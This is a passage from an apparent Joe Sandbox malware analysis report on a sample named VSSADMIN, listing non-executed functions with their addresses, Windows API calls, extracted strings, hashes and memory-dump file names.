                                                                                                                                                                      • Instruction ID: c2dc439a3e07cf12c6c8a97061bfe7f530db5fbb37d1289f7fe249e7d715aabf
                                                                                                                                                                      • Opcode Fuzzy Hash: 14271922cd67107be1aa73486209c40478193cbc4b897bf2be9679daf36d23cb
                                                                                                                                                                      • Instruction Fuzzy Hash: 34E02611B1858682EE089767F54146AA161AF48FD0B089036DE0D83716DD2DD4804A00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FF614C71B90 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                      • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                      • API String ID: 2446303242-1601438679
                                                                                                                                                                      • Opcode ID: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
                                                                                                                                                                      • Instruction ID: 801b439429b27baf6ecd1df9797fe4a70b957b65cb2c3ca371bbec845ee868d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
                                                                                                                                                                      • Instruction Fuzzy Hash: 90A16A36218F8197E7148F26E58479AB370F789BA4F50412AEB8D43B24CF3EE165CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF2671 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentVariable$ByteCharMultiWide
                                                                                                                                                                      • String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
                                                                                                                                                                      • API String ID: 2184640988-1666712896
                                                                                                                                                                      • Opcode ID: 9bdffb1b50c3161ebfeb316bcddf5aa0d76d079b0f97c82e6ecc90dc1062e570
                                                                                                                                                                      • Instruction ID: a64d13cd417bde63bbdea354a54341773e3750b40902b89e0aaa265eedcbfbf3
                                                                                                                                                                      • Opcode Fuzzy Hash: 9bdffb1b50c3161ebfeb316bcddf5aa0d76d079b0f97c82e6ecc90dc1062e570
                                                                                                                                                                      • Instruction Fuzzy Hash: 0261B122708B8645EB198F25A86027967A5EF45BF4B588331DF6D43BD4DFBDE809A300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C767A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C76837
                                                                                                                                                                        • Part of subcall function 00007FF614C769B0: GetEnvironmentVariableW.KERNEL32(00007FF614C73707), ref: 00007FF614C769EA
                                                                                                                                                                        • Part of subcall function 00007FF614C769B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF614C76A07
                                                                                                                                                                        • Part of subcall function 00007FF614C866E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C866FD
                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C768F1
                                                                                                                                                                        • Part of subcall function 00007FF614C72770: MessageBoxW.USER32 ref: 00007FF614C72845
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                      • API String ID: 3752271684-1116378104
                                                                                                                                                                      • Opcode ID: 0274a45065aed080cbde3c9ac4a42289c92a47d5d649372871529f0d26a49517
                                                                                                                                                                      • Instruction ID: 1cae1ea25543fdb881c81395485c0a068bf470262e7b5c1990f7eaaaa6251334
                                                                                                                                                                      • Opcode Fuzzy Hash: 0274a45065aed080cbde3c9ac4a42289c92a47d5d649372871529f0d26a49517
                                                                                                                                                                      • Instruction Fuzzy Hash: 29515D21B0DA4392FE14A776A9952BAA2619F47FF1F445037ED0ECB797EE2DE4018300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF5A24 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: a2d914222e0312e5cf461600ac8b059d6c61fa3806f1dd2a9609d900ee9212fe
                                                                                                                                                                      • Instruction ID: 87382159bc7bedb7ec190a006a1c6c045a977c5574e2d10e5ad9868f2828325e
                                                                                                                                                                      • Opcode Fuzzy Hash: a2d914222e0312e5cf461600ac8b059d6c61fa3806f1dd2a9609d900ee9212fe
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F315972708B858AEB649F60E8607EE7364FB84748F44413ADB4E57B88DF78D548D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B6CC Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
                                                                                                                                                                      • Instruction ID: f8043513b5143111166cb1be153dfde0e0a9889e6b983e9f6b1439ac5fa07e28
                                                                                                                                                                      • Opcode Fuzzy Hash: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
                                                                                                                                                                      • Instruction Fuzzy Hash: FD314D76608E8196EB608F64E8803E97371FB85B58F44403ADB4D87A98EF3DD648C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C94E50 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C94E95
                                                                                                                                                                        • Part of subcall function 00007FF614C947E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C947FC
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: HeapFree.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
                                                                                                                                                                        • Part of subcall function 00007FF614C89E00: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF614C89DDF,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C89E09
                                                                                                                                                                        • Part of subcall function 00007FF614C89E00: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF614C89DDF,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C89E2E
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C94E84
                                                                                                                                                                        • Part of subcall function 00007FF614C94848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9485C
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C950FA
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9510B
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9511C
                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF614C9535C), ref: 00007FF614C95143
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4070488512-0
                                                                                                                                                                      • Opcode ID: 2cc5a4cded4ecef5b1ebc9d4bcc7e49c1205c2bdcadbae89e659e8d650b3b6a2
                                                                                                                                                                      • Instruction ID: cb42433b5953b0dda67b1e0089ff244890e0d84ac0495b15073d0d30240f97a8
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cc5a4cded4ecef5b1ebc9d4bcc7e49c1205c2bdcadbae89e659e8d650b3b6a2
                                                                                                                                                                      • Instruction Fuzzy Hash: 3BD1C126E08A4296E7249F25D4D01B967B1FF56FA8F448137EA0DC7A85DF3DE841C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C89B14 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      • Opcode ID: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
                                                                                                                                                                      • Instruction ID: 0a12bd7df231abbe741c659f4b0952ab2586f86e3b7f15c9633988d0bca6aba2
                                                                                                                                                                      • Opcode Fuzzy Hash: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
                                                                                                                                                                      • Instruction Fuzzy Hash: 67314136618F8196DB64CB25E8802EE73B4FB85B68F500136EA9D83B95DF3DD545C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C909E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                      • Opcode ID: 623d3f57ef72cd0df657952e6d1f3843b180603a65a1e46de5efd301fd58a1b3
                                                                                                                                                                      • Instruction ID: 962ff6a41b4d55d3988710cef1e5ff54d8f6c494a582aed03bfcb54f23ff9a01
                                                                                                                                                                      • Opcode Fuzzy Hash: 623d3f57ef72cd0df657952e6d1f3843b180603a65a1e46de5efd301fd58a1b3
                                                                                                                                                                      • Instruction Fuzzy Hash: FFB1B562B19E9651EA609B26D4806BA63B1EB46FF8F444133EE5D87B85DF3DE441C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C950CC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C950FA
                                                                                                                                                                        • Part of subcall function 00007FF614C94848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9485C
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9510B
                                                                                                                                                                        • Part of subcall function 00007FF614C947E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C947FC
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9511C
                                                                                                                                                                        • Part of subcall function 00007FF614C94818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9482C
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: HeapFree.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF614C9535C), ref: 00007FF614C95143
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3458911817-0
                                                                                                                                                                      • Opcode ID: e2ff6b89c74d0715b8c25be54fefa0a6bdbc36a2ab972a0e38a943a05cc41bbd
                                                                                                                                                                      • Instruction ID: 3467c06d292c2f9e9a3e86a1de5ffc1b2cf8cfba00a850a0ab9599cce632a896
                                                                                                                                                                      • Opcode Fuzzy Hash: e2ff6b89c74d0715b8c25be54fefa0a6bdbc36a2ab972a0e38a943a05cc41bbd
                                                                                                                                                                      • Instruction Fuzzy Hash: B251AD36A08E4296E714DF21E8C15B96770FB5AFA8F408137EA0DC3A96DF3DE4418740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF2B62 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
